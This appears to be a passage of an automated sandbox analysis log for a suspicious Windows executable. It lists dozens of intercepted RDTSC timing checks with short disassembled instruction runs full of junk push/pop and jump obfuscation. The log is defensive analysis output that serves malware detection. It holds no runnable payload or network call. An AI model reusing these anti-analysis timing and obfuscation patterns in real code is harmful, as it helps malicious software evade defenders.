Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 470B29 second address: 470B36 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3A94CD4076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B80051 second address: 4B8007E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3A9502B5EEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B8007E second address: 4B800B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3A94CD4081h 0x00000008 call 00007F3A94CD4080h 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F3A94CD407Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B800B5 second address: 4B800BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B800BB second address: 4B800E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov dx, 27BAh 0x0000000f mov esi, edx 0x00000011 popad 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F3A94CD4088h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BC00DB second address: 4BC00E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BC00E1 second address: 4BC0119 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4088h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3A94CD4087h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B500F5 second address: 4B500F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B500F9 second address: 4B500FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B500FF second address: 4B50170 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 mov edx, 54565454h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F3A9502B5F3h 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 mov al, D9h 0x00000018 movsx ebx, si 0x0000001b popad 0x0000001c push dword ptr [ebp+04h] 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F3A9502B5F6h 0x00000026 sub ecx, 1D121A68h 0x0000002c jmp 00007F3A9502B5EBh 0x00000031 popfd 0x00000032 mov di, ax 0x00000035 popad 0x00000036 push dword ptr [ebp+0Ch] 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F3A9502B5F1h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B70DB8 second address: 4B70DBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B706F5 second address: 4B706FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B706FB second address: 4B7070A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD407Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B7070A second address: 4B7070E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B7070E second address: 4B7073D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F3A94CD4081h 0x00000011 call 00007F3A94CD4080h 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B7073D second address: 4B70758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5F7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B70758 second address: 4B7077D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F3A94CD4085h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B7077D second address: 4B70784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B70784 second address: 4B707C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4082h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F3A94CD407Dh 0x00000013 sub cx, 4F36h 0x00000018 jmp 00007F3A94CD4081h 0x0000001d popfd 0x0000001e mov bh, al 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B705C1 second address: 4B705DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B705DE second address: 4B70613 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F3A94CD407Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3A94CD407Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B70613 second address: 4B70625 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5EEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B70625 second address: 4B70629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B70629 second address: 4B7064F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3A9502B5F9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B7064F second address: 4B70653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B70653 second address: 4B70659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B70659 second address: 4B70671 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B70671 second address: 4B70675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B70675 second address: 4B70692 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B70692 second address: 4B70698 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B70698 second address: 4B706B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a movsx edi, si 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3A94CD407Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B803A0 second address: 4B803CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3A9502B5ECh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B803CC second address: 4B803D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BC0010 second address: 4BC0016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BC0016 second address: 4BC001A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BC001A second address: 4BC001E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BC001E second address: 4BC0046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F3A94CD4086h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BC0046 second address: 4BC004A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BC004A second address: 4BC0050 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BC0050 second address: 4BC0056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B90545 second address: 4B90558 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B90558 second address: 4B90583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 call 00007F3A9502B5EBh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F3A9502B5F1h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B90583 second address: 4B90598 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B90598 second address: 4B905A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B905A8 second address: 4B905AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B70543 second address: 4B70549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B70549 second address: 4B7054D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B900CA second address: 4B900E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5F4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B900E2 second address: 4B9010A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3A94CD4084h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B9010A second address: 4B90111 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B90111 second address: 4B90143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F3A94CD4089h 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3A94CD407Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B90143 second address: 4B9014A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B9014A second address: 4B9015B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov ax, FD77h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B9015B second address: 4B90160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B90160 second address: 4B90166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B90166 second address: 4B9016A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B9016A second address: 4B9016E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B9030C second address: 4B9031B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 movzx ecx, bx 0x00000008 popad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B9031B second address: 4B90325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 73D8DE6Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B90325 second address: 4B90388 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 jmp 00007F3A9502B5EEh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F3A9502B5F0h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F3A9502B5EDh 0x00000021 sub ch, 00000056h 0x00000024 jmp 00007F3A9502B5F1h 0x00000029 popfd 0x0000002a jmp 00007F3A9502B5F0h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B90388 second address: 4B9038E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B9038E second address: 4B90392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BB06DB second address: 4BB06F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, esi 0x0000000f mov ax, 28E5h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BB06F7 second address: 4BB06FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BB06FD second address: 4BB0701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BB0701 second address: 4BB070D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BB070D second address: 4BB073B instructions: 0x00000000 rdtsc 0x00000002 mov si, BF37h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov cl, 17h 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov bl, 40h 0x00000010 jmp 00007F3A94CD407Eh 0x00000015 popad 0x00000016 xchg eax, ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov ebx, 3AD1E570h 0x0000001f mov ebx, 5FC7E89Ch 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BB073B second address: 4BB0741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BB0741 second address: 4BB0763 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3A94CD4085h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BB0763 second address: 4BB0778 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BB0778 second address: 4BB077E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BB077E second address: 4BB07CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a mov ebx, 7F686748h 0x0000000f jmp 00007F3A9502B5F1h 0x00000014 popad 0x00000015 mov eax, dword ptr [774365FCh] 0x0000001a jmp 00007F3A9502B5EEh 0x0000001f test eax, eax 0x00000021 pushad 0x00000022 mov si, C3FDh 0x00000026 mov ebx, ecx 0x00000028 popad 0x00000029 je 00007F3B0782E790h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F3A9502B5EBh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BB07CF second address: 4BB0833 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3A94CD407Fh 0x00000009 xor ch, FFFFFF9Eh 0x0000000c jmp 00007F3A94CD4089h 0x00000011 popfd 0x00000012 call 00007F3A94CD4080h 0x00000017 pop esi 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ecx, eax 0x0000001d pushad 0x0000001e mov di, 6162h 0x00000022 mov ecx, edi 0x00000024 popad 0x00000025 xor eax, dword ptr [ebp+08h] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F3A94CD4081h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BB0833 second address: 4BB087D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3A9502B5F7h 0x00000009 adc esi, 0C4867BEh 0x0000000f jmp 00007F3A9502B5F9h 0x00000014 popfd 0x00000015 mov ax, 3107h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c and ecx, 1Fh 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BB087D second address: 4BB0881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BB0881 second address: 4BB08D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ch, 2Eh 0x00000008 popad 0x00000009 ror eax, cl 0x0000000b jmp 00007F3A9502B5EDh 0x00000010 leave 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F3A9502B5ECh 0x00000018 and ax, 5B18h 0x0000001d jmp 00007F3A9502B5EBh 0x00000022 popfd 0x00000023 call 00007F3A9502B5F8h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BB0957 second address: 4BB0973 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BB0973 second address: 4BB0977 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BB0977 second address: 4BB097D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BB097D second address: 4BB09B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 4227h 0x00000007 mov ebx, esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F3A9502B5F9h 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov di, 081Eh 0x0000001a mov dx, 882Ah 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4BB09B0 second address: 4BB09CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD4087h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B60016 second address: 4B6001C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B6001C second address: 4B60084 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov cx, bx 0x0000000d mov cx, bx 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 mov dl, C2h 0x00000015 pushfd 0x00000016 jmp 00007F3A94CD407Eh 0x0000001b add al, 00000028h 0x0000001e jmp 00007F3A94CD407Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 jmp 00007F3A94CD4086h 0x0000002c and esp, FFFFFFF8h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F3A94CD4087h 0x00000036 rdtsc
